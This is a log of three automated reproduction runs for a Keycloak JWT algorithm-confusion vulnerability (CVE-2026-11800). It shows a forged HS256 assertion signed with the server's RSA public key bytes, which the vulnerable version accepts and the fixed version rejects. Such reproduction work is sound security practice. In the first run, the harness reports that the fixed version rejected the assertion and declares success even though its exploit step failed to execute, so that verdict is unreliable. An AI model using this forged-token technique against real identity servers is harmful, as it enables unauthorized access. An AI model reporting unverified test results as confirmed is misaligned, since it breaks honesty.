[15:33:37] === CVE-2026-11800: Keycloak JWT Algorithm Confusion === [15:33:37] Creating Docker network: kcnet-cve11800 [15:33:37] Pulling vulnerable image: quay.io/keycloak/keycloak:26.6.3 [15:33:38] Pulling fixed image: quay.io/keycloak/keycloak:26.6.4 [15:33:39] Starting vulnerable Keycloak (26.6.3)... [15:33:40] Starting fixed Keycloak (26.6.4)... [15:33:40] Starting Python client container... [15:33:41] Installing Python dependencies in client container... [15:33:44] Waiting for vulnerable Keycloak to be ready... [15:33:57] vulnerable Keycloak is UP (after 15s) [15:33:57] Waiting for fixed Keycloak to be ready... [15:33:57] fixed Keycloak is UP (after 3s) [15:33:57] Writing exploit script to client container... [15:33:57] ============================================ [15:33:57] Running exploit against VULNERABLE version (26.6.3)... [15:33:57] ============================================ === CVE-2026-11800 Exploit against vulnerable Keycloak (keycloak-vuln-cve11800) === Admin token obtained. Create realm: 201 Realm issuer: http://localhost:8080/realms/test-realm Token endpoint: http://keycloak-vuln-cve11800:8080/realms/test-realm/protocol/openid-connect/token RSA key pair generated. DER bytes: 294 Create IdP: 201 Create client: 201 Create user: 201 Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT payload: {"jti": "0b704900-71ad-4020-8308-23234b694028", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783265942, "iat": 1783265642} HMAC secret = RSA public key DER bytes (294 bytes) Submitting HS256 assertion to token endpoint... Response status: 200 *** vulnerable: HS256 assertion ACCEPTED! Access token received. *** Token subject: 5615f5dc-2d36-4aaa-b42f-7692ea4c8fe6 Token preferred_username: basic-user Token azp (client): test-app Token iss: http://localhost:8080/realms/test-realm === RESULT (vulnerable): VULNERABLE === [15:34:02] Vulnerable version result: HS256 assertion ACCEPTED [15:34:02] ============================================ [15:34:02] Running exploit against FIXED version (26.6.4)... [15:34:02] ============================================ OCI runtime exec failed: exec failed: unable to start container process: exec: "python3": executable file not found in $PATH [15:34:02] Fixed version result: HS256 assertion REJECTED [15:34:02] ============================================ [15:34:02] VERDICT: VULNERABILITY CONFIRMED [15:34:02] - Vulnerable (26.6.3): HS256 assertion ACCEPTED, access token issued [15:34:02] - Fixed (26.6.4): HS256 assertion REJECTED with 'Invalid signature algorithm' [15:34:02] ============================================ [15:34:02] Cleaning up containers... [15:34:03] Reproduction successful. Exiting 0. [15:34:55] === CVE-2026-11800: Keycloak JWT Algorithm Confusion === [15:34:55] Creating Docker network: kcnet-cve11800 [15:34:55] Pulling vulnerable image: quay.io/keycloak/keycloak:26.6.3 [15:34:56] Pulling fixed image: quay.io/keycloak/keycloak:26.6.4 [15:34:57] Starting vulnerable Keycloak (26.6.3)... [15:34:57] Starting fixed Keycloak (26.6.4)... [15:34:58] Starting Python client container... [15:35:03] Installing Python dependencies in client container... [15:35:06] Python dependencies installed. [15:35:06] Waiting for vulnerable Keycloak to be ready... [15:35:16] vulnerable Keycloak is UP (after 12s) [15:35:16] Waiting for fixed Keycloak to be ready... [15:35:16] fixed Keycloak is UP (after 3s) [15:35:16] Writing exploit script to client container... [15:35:16] Running combined exploit against both Keycloak versions... === Exploit against vulnerable Keycloak (keycloak-vuln-cve11800) === === Exploit against vulnerable Keycloak (keycloak-vuln-cve11800) === Admin token obtained. Admin token obtained. Create realm: 201 Create realm: 201 Realm issuer: http://localhost:8080/realms/test-realm Realm issuer: http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 RSA key pair generated. DER bytes: 294 Create IdP: 201 Create IdP: 201 Create client: 201 Create client: 201 Create user: 201 Create user: 201 Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT payload: {"jti": "17009808-83d2-42ce-b21d-d2218201c59d", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266020, "iat": 1783265720} Forged JWT payload: {"jti": "17009808-83d2-42ce-b21d-d2218201c59d", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266020, "iat": 1783265720} HMAC secret = RSA public key DER bytes (294 bytes) HMAC secret = RSA public key DER bytes (294 bytes) Submitting HS256 assertion to token endpoint... Submitting HS256 assertion to token endpoint... Response status: 200 Response status: 200 *** vulnerable: HS256 assertion ACCEPTED! Access token received. *** *** vulnerable: HS256 assertion ACCEPTED! Access token received. *** Token subject: 8adfd86d-ebda-4e55-a149-87e6d8b41fc1 Token subject: 8adfd86d-ebda-4e55-a149-87e6d8b41fc1 Token preferred_username: basic-user Token preferred_username: basic-user Token azp (client): test-app Token azp (client): test-app === Exploit against fixed Keycloak (keycloak-fixed-cve11800) === === Exploit against fixed Keycloak (keycloak-fixed-cve11800) === Admin token obtained. Admin token obtained. Create realm: 201 Create realm: 201 Realm issuer: http://localhost:8080/realms/test-realm Realm issuer: http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 RSA key pair generated. DER bytes: 294 Create IdP: 201 Create IdP: 201 Create client: 201 Create client: 201 Create user: 201 Create user: 201 Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT payload: {"jti": "339a726e-6a9d-4ed0-8e84-dd0367e39a91", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266028, "iat": 1783265728} Forged JWT payload: {"jti": "339a726e-6a9d-4ed0-8e84-dd0367e39a91", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266028, "iat": 1783265728} HMAC secret = RSA public key DER bytes (294 bytes) HMAC secret = RSA public key DER bytes (294 bytes) Submitting HS256 assertion to token endpoint... Submitting HS256 assertion to token endpoint... Response status: 400 Response status: 400 fixed: HS256 assertion REJECTED. Error: invalid_grant, Description: Invalid signature algorithm fixed: HS256 assertion REJECTED. Error: invalid_grant, Description: Invalid signature algorithm === SUMMARY === Vulnerable (26.6.3): HS256 assertion ACCEPTED Fixed (26.6.4): HS256 assertion REJECTED VERDICT: VULNERABILITY CONFIRMED [15:35:28] ============================================ [15:35:28] VERDICT: VULNERABILITY CONFIRMED [15:35:28] - Vulnerable (26.6.3): HS256 assertion ACCEPTED, access token issued [15:35:28] - Fixed (26.6.4): HS256 assertion REJECTED with 'Invalid signature algorithm' [15:35:28] ============================================ [15:35:28] Cleaning up containers... [15:35:29] Reproduction successful. Exiting 0. [15:35:38] === CVE-2026-11800: Keycloak JWT Algorithm Confusion === [15:35:38] Creating Docker network: kcnet-cve11800 [15:35:38] Pulling vulnerable image: quay.io/keycloak/keycloak:26.6.3 [15:35:39] Pulling fixed image: quay.io/keycloak/keycloak:26.6.4 [15:35:40] Starting vulnerable Keycloak (26.6.3)... [15:35:41] Starting fixed Keycloak (26.6.4)... [15:35:41] Starting Python client container... [15:35:47] Installing Python dependencies in client container... [15:35:49] Python dependencies installed. [15:35:49] Waiting for vulnerable Keycloak to be ready... [15:35:56] vulnerable Keycloak is UP (after 9s) [15:35:56] Waiting for fixed Keycloak to be ready... [15:35:56] fixed Keycloak is UP (after 3s) [15:35:56] Writing exploit script to client container... [15:35:56] Running combined exploit against both Keycloak versions... === Exploit against vulnerable Keycloak (keycloak-vuln-cve11800) === === Exploit against vulnerable Keycloak (keycloak-vuln-cve11800) === Admin token obtained. Admin token obtained. Create realm: 201 Create realm: 201 Realm issuer: http://localhost:8080/realms/test-realm Realm issuer: http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 RSA key pair generated. DER bytes: 294 Create IdP: 201 Create IdP: 201 Create client: 201 Create client: 201 Create user: 201 Create user: 201 Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT payload: {"jti": "be8c3379-cf2f-4c40-8513-e397e3fac0db", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266061, "iat": 1783265761} Forged JWT payload: {"jti": "be8c3379-cf2f-4c40-8513-e397e3fac0db", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266061, "iat": 1783265761} HMAC secret = RSA public key DER bytes (294 bytes) HMAC secret = RSA public key DER bytes (294 bytes) Submitting HS256 assertion to token endpoint... Submitting HS256 assertion to token endpoint... Response status: 200 Response status: 200 *** vulnerable: HS256 assertion ACCEPTED! Access token received. *** *** vulnerable: HS256 assertion ACCEPTED! Access token received. *** Token subject: f97f34a8-eb71-45c1-b2d9-f1fe09e6b993 Token subject: f97f34a8-eb71-45c1-b2d9-f1fe09e6b993 Token preferred_username: basic-user Token preferred_username: basic-user Token azp (client): test-app Token azp (client): test-app === Exploit against fixed Keycloak (keycloak-fixed-cve11800) === === Exploit against fixed Keycloak (keycloak-fixed-cve11800) === Admin token obtained. Admin token obtained. Create realm: 201 Create realm: 201 Realm issuer: http://localhost:8080/realms/test-realm Realm issuer: http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 RSA key pair generated. DER bytes: 294 Create IdP: 201 Create IdP: 201 Create client: 201 Create client: 201 Create user: 201 Create user: 201 Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT payload: {"jti": "1b8fd6f6-0636-481c-aca1-caca7de4fe74", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266068, "iat": 1783265768} Forged JWT payload: {"jti": "1b8fd6f6-0636-481c-aca1-caca7de4fe74", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266068, "iat": 1783265768} HMAC secret = RSA public key DER bytes (294 bytes) HMAC secret = RSA public key DER bytes (294 bytes) Submitting HS256 assertion to token endpoint... Submitting HS256 assertion to token endpoint... Response status: 400 Response status: 400 fixed: HS256 assertion REJECTED. Error: invalid_grant, Description: Invalid signature algorithm fixed: HS256 assertion REJECTED. Error: invalid_grant, Description: Invalid signature algorithm === SUMMARY === Vulnerable (26.6.3): HS256 assertion ACCEPTED Fixed (26.6.4): HS256 assertion REJECTED VERDICT: VULNERABILITY CONFIRMED [15:36:08] ============================================ [15:36:08] VERDICT: VULNERABILITY CONFIRMED [15:36:08] - Vulnerable (26.6.3): HS256 assertion ACCEPTED, access token issued [15:36:08] - Fixed (26.6.4): HS256 assertion REJECTED with 'Invalid signature algorithm' [15:36:08] ============================================ [15:36:08] Cleaning up containers... [15:36:09] Reproduction successful. Exiting 0.